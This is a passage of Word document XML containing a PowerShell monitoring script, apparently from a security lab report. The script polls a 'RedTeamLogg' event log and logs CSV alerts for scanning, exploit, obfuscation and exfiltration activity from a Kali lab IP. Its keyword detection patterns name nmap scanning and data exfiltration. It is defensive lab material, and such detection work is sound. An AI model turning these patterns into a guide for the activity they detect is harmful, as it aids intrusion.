        </w:rPr>
        <w:t xml:space="preserve">    "Timestamp,Phase,Description,SourceIP" | Out-File -FilePath $logFile -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2BCF8E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DC87B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">$attackerIP = "192.168.1.43"   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t># Kali IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AF852">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>while ($true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DC822">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> # === RECON detection ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC54366">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    $reconEvents = Get-WinEvent -LogName "RedTeamLogg" -MaxEvents 20 -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067859DD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">                   Where-Object { $_.Message -like "*scan*" -or $_.Message -like "*nmap*" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD89B26">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    foreach ($event in $reconEvents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7BCF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        $time = $event.TimeCreated.ToString("yyyy-MM-dd HH:mm:ss")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B8DE6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$time,RECON,Possible scanning activity detected,$attackerIP" | Out-File -Append -FilePath $logFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC363F6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303A9AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> # === EXPLOIT detection ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85AF5D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    $exploitEvents = Get-WinEvent -LogName "RedTeamLogg" -MaxEvents 20 -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E87BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">                     Where-Object { $_.Message -like "*Simulated*" -or $_.Message -like "*unauthorized*" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129117C3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    foreach ($event in $exploitEvents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E040F1A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        $time = $event.TimeCreated.ToString("yyyy-MM-dd HH:mm:ss")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72616F97">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$time,EXPLOIT,Suspicious login/exploit attempt,$attackerIP" | Out-File -Append -FilePath $logFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE51CA">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AD239">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABF7B2F">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664FAF94">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FF9C6C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    # === EVASION detection ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F49CED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    $evasionEvents = Get-WinEvent -LogName "RedTeamLogg" -MaxEvents 20 -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A3785">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">                     Where-Object { $_.Message -like "*Evasion*" -or $_.Message -like "*encoded*" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100AA6F8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    foreach ($event in $evasionEvents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115588AE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        $time = $event.TimeCreated.ToString("yyyy-MM-dd HH:mm:ss")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607598F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$time,EVASION,Obfuscated PowerShell execution detected,$attackerIP" | Out-File -Append -FilePath $logFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBAA31">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8CC6B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  # === EXFILTRATION detection ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B01D5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">     $exfilEvents = Get-WinEvent -LogName "RedTeamLogg" -MaxEvents 20 -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C33ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">                    Where-Object { $_.Message -like "*exfil*" -or $_.Message -like "*copy*" -or $_.Message -like "*SMB*" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013E503">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    foreach ($event in $exfilEvents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BE2B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        $time = $event.TimeCreated.ToString("yyyy-MM-dd HH:mm:ss")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557C1A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$time,EXFIL,Possible data exfiltration detected,$attackerIP" | Out-File -Append -FilePath $logFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAFEFA1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F95090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    Start-Sleep -Seconds 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247375B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432"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2E">
    <w:pPr>
      <w:jc w:val="center"/>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2F">
    <w:pPr>
      <w:jc w:val="center"/>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2D">
    <w:r>
      <w:drawing>
        <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-671195</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-281305</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7788275" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="14605" b="12065"/>
          <wp:wrapTopAndBottom/>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
                  <a:srcRect t="6796"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7788275" cy="1023938"/>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9E11B1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="999E11B1"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="9ECADD3D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9ECADD3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45800C4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A45800C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
    <w:nsid w:val="AB0C965F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AB0C965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E0C9C772"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E0C9C77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F2B39A51"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F2B39A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4F7B257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F7B257"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="850"/>
        </w:tabs>
        <w:ind w:left="850" w:leftChars="0" w:hanging="453" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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7">
    <w:nsid w:val="13450CEC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="13450CE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8">
    <w:nsid w:val="206CB0D8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="206CB0D8"/>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9">
    <w:nsid w:val="287428F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="287428F4"/>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59D7E92C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59D7E92C"/>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1">
    <w:nsid w:val="64C463BF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="64C463BF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>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0D019E4"/>
    <w:rsid w:val="02017B58"/>
    <w:rsid w:val="023625B0"/>
    <w:rsid w:val="03804C20"/>
    <w:rsid w:val="083D1794"/>
    <w:rsid w:val="08C94FF8"/>
    <w:rsid w:val="0C203DF5"/>
    <w:rsid w:val="0D2F4665"/>
    <w:rsid w:val="0E880A3A"/>
    <w:rsid w:val="0E9512FB"/>
    <w:rsid w:val="16393EB4"/>
    <w:rsid w:val="1B217891"/>
    <w:rsid w:val="1E93319C"/>
    <w:rsid w:val="213F068F"/>
    <w:rsid w:val="21B95DF1"/>
    <w:rsid w:val="229F7A26"/>
    <w:rsid w:val="25700DFA"/>
    <w:rsid w:val="2BB07A36"/>
    <w:rsid w:val="2C067F05"/>
    <w:rsid w:val="2C702950"/>
    <w:rsid w:val="2D3F104B"/>
    <w:rsid w:val="2ED576A0"/>
    <w:rsid w:val="30CE7FA2"/>
    <w:rsid w:val="32134DB6"/>
    <w:rsid w:val="32A23217"/>
    <w:rsid w:val="33340711"/>
    <w:rsid w:val="33CB62B0"/>
    <w:rsid w:val="354074ED"/>
    <w:rsid w:val="356928AF"/>
    <w:rsid w:val="37AA0E6B"/>
    <w:rsid w:val="40313E05"/>
    <w:rsid w:val="408F05F9"/>
    <w:rsid w:val="41C67479"/>
    <w:rsid w:val="42BE2BE5"/>
    <w:rsid w:val="451B3B9E"/>
    <w:rsid w:val="49E1738F"/>
    <w:rsid w:val="4BB77389"/>
    <w:rsid w:val="4DEC4CE8"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4F1D2E5C"/>
    <w:rsid w:val="50770CC7"/>
    <w:rsid w:val="54833692"/>
    <w:rsid w:val="571E735B"/>
    <w:rsid w:val="597E7B62"/>
    <w:rsid w:val="59BE7110"/>
    <w:rsid w:val="5B21121A"/>
    <w:rsid w:val="5D17062D"/>
    <w:rsid w:val="5FF50530"/>
    <w:rsid w:val="61F26C63"/>
    <w:rsid w:val="624A4733"/>
    <w:rsid w:val="661A0911"/>
    <w:rsid w:val="6AE17565"/>
    <w:rsid w:val="6BE73308"/>
    <w:rsid w:val="708966DF"/>
    <w:rsid w:val="7143673E"/>
    <w:rsid w:val="716F4C2B"/>
    <w:rsid w:val="73B629EC"/>
    <w:rsid w:val="75DB288E"/>
    <w:rsid w:val="76101441"/>
    <w:rsid w:val="76FA5DB4"/>
    <w:rsid w:val="79A92B3A"/>
    <w:rsid w:val="7CA10480"/>
    <w:rsid w:val="7D084EB2"/>
    <w:rsid w:val="7D274676"/>
    <w:rsid w:val="7D6E2658"/>
    <w:rsid w:val="7DE463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50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="400" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>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link w:val="28"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>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FollowedHyperlink"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
